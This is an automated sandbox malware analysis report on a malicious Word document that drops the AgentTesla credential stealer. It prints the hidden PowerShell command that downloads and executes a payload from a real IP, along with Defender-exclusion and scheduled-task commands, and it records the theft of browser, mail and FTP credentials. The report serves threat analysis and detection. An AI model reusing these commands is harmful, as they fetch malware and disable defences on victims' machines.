                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe "C:\Users\user\AppData\Roaming\taskmg.exe"
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe C:\Users\user\AppData\Roaming\taskmg.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeQueries volume information: C:\Users\user\AppData\Roaming\taskmg.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeQueries volume information: C:\Users\user\AppData\Roaming\taskmg.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.taskmg.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.396b420.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.39a1640.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.39a1640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.396b420.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 1156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 2784, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)Show sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Tries to harvest and steal ftp login credentialsShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: Yara matchFile source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 2784, type: MEMORYSTR

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.taskmg.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.396b420.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.39a1640.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.39a1640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.396b420.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 1156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 2784, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection211Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting3Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture11System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Scripting3Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery1Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter11Network Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsVirtualization/Sandbox Evasion131SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaScheduled Task/Job1Rc.commonRc.commonMasquerading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesPowerShell3Startup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection211Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 528737 Sample: Reconfirm The Details.doc Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Found malware configuration 2->57 59 Sigma detected: Powershell download and execute file 2->59 61 20 other signatures 2->61 8 WINWORD.EXE 306 47 2->8         started        process3 dnsIp4 47 173.232.204.89, 49165, 49166, 80 EONIX-COMMUNICATIONS-ASBLOCK-62904US United States 8->47 39 C:\Users\user\AppData\Local\...\taskmg[1].exe, PE32 8->39 dropped 41 C:\Users\user\AppData\...\abdtfhghgeghDp .ScT, data 8->41 dropped 43 C:\Users\user\AppData\Local\...\3263CED7.png, 370 8->43 dropped 71 Document exploit detected (creates forbidden files) 8->71 73 Suspicious powershell command line found 8->73 75 Tries to download and execute files (via powershell) 8->75 77 Microsoft Office creates scripting files 8->77 13 powershell.exe 12 7 8->13         started        17 notepad.exe 8->17         started        19 powershell.exe 7 8->19         started        21 2 other processes 8->21 file5 signatures6 process7 file8 45 C:\Users\user\AppData\Roaming\taskmg.exe, PE32 13->45 dropped 87 Powershell drops PE file 13->87 23 taskmg.exe 3 13->23         started        89 Injects files into Windows application 17->89 signatures9 process10 file11 35 C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, PE32 23->35 dropped 37 C:\Users\user\AppData\Local\...\tmp3054.tmp, XML 23->37 dropped 63 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 23->63 65 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 23->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 23->67 69 2 other signatures 23->69 27 taskmg.exe 10 23->27         started        31 powershell.exe 6 23->31         started        33 schtasks.exe 23->33         started        signatures12 process13 dnsIp14 49 208.91.198.143, 49174, 587 PUBLIC-DOMAIN-REGISTRYUS United States 27->49 51 208.91.199.223, 49169, 587 PUBLIC-DOMAIN-REGISTRYUS United States 27->51 53 2 other IPs or domains 27->53 79 Tries to steal Mail credentials (via file / registry access) 27->79 81 Tries to harvest and steal ftp login credentials 27->81 83 Tries to harvest and steal browser information (history, passwords, etc) 27->83 85 Installs a global keyboard hook 27->85 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Reconfirm The Details.doc30%ReversingLabsScript.Trojan.RTFObfustream

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    14.0.taskmg.exe.400000.13.unpack100%AviraTR/Spy.Gen8Download File
                    14.0.taskmg.exe.400000.9.unpack100%AviraTR/Spy.Gen8Download File
                    14.2.taskmg.exe.400000.0.unpack100%AviraHEUR/AGEN.1143187Download File
                    14.0.taskmg.exe.400000.11.unpack100%AviraTR/Spy.Gen8Download File
                    14.0.taskmg.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                    14.0.taskmg.exe.400000.7.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://java.co_w0%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    httP://173.232.20%Avira URL Cloudsafe
                    httP://173.232.204.89/taskmg.0%Avira URL Cloudsafe
                    http://EW9kaPSTVWDzFNsliGsC.org(Zgt0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    httP://173.232.204.89/t0%Avira URL Cloudsafe
                    http://173.232.204.89/taskmg.exe0%Avira URL Cloudsafe
                    http://173.232.204.890%Avira URL Cloudsafe
                    http://EW9kaPSTVWDzFNsliGsC.org0%Avira URL Cloudsafe
                    https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    httP://173.2320%Avira URL Cloudsafe
                    http://GwvXXB.com0%Avira URL Cloudsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    http://servername/isapibackend.dll0%Avira URL Cloudsafe
                    httP://173.232.204.89/taskmg.exePE0%Avira URL Cloudsafe
                    http://java.cohe0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    		208.91.199.224
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://173.232.204.89/taskmg.exetrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://java.co_wpowershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNStaskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      httP://173.232.2powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      		low
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmpfalse
                        		high
                        httP://173.232.204.89/taskmg.powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://EW9kaPSTVWDzFNsliGsC.org(Zgttaskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hataskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        httP://173.232.204.89/tpowershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://173.232.204.89powershell.exe, 00000003.00000002.430015540.0000000003749000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        httP://173.232.204.89/taskmg.exepowershell.exe, 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.419023647.0000000002C91000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.418378144.00000000004A4000.00000004.00000040.sdmptrue
                          		unknown
                          http://EW9kaPSTVWDzFNsliGsC.orgtaskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ipify.org%GETMozilla/5.0taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		low
                          http://www.%s.comPApowershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		low
                          httP://173.232powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		low
                          http://www.piriform.com/ccleanervpowershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmpfalse
                            		high
                            http://GwvXXB.comtaskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametaskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpfalse
                              		high
                              https://api.ipify.org%taskmg.exe, 0000000E.00000002.705002661.00000000027F0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		low
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziptaskmg.exe, 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, taskmg.exe, 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://servername/isapibackend.dllschtasks.exe, 0000000C.00000002.437567787.0000000000740000.00000002.00020000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              httP://173.232.204.89/taskmg.exePEpowershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://java.cohepowershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              208.91.198.143
                              		unknownUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUStrue
                              208.91.199.225
                              		unknownUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUStrue
                              208.91.199.223
                              		unknownUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUStrue
                              208.91.199.224
                              		us2.smtp.mailhostbox.comUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                              173.232.204.89
                              		unknownUnited States
                              		62904EONIX-COMMUNICATIONS-ASBLOCK-62904UStrue

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:528737
                              Start date:25.11.2021
                              Start time:18:14:04
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 10m 52s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:Reconfirm The Details.doc
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:19
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winDOC@21/27@9/5
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 90%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .doc
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Active ActiveX Object
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
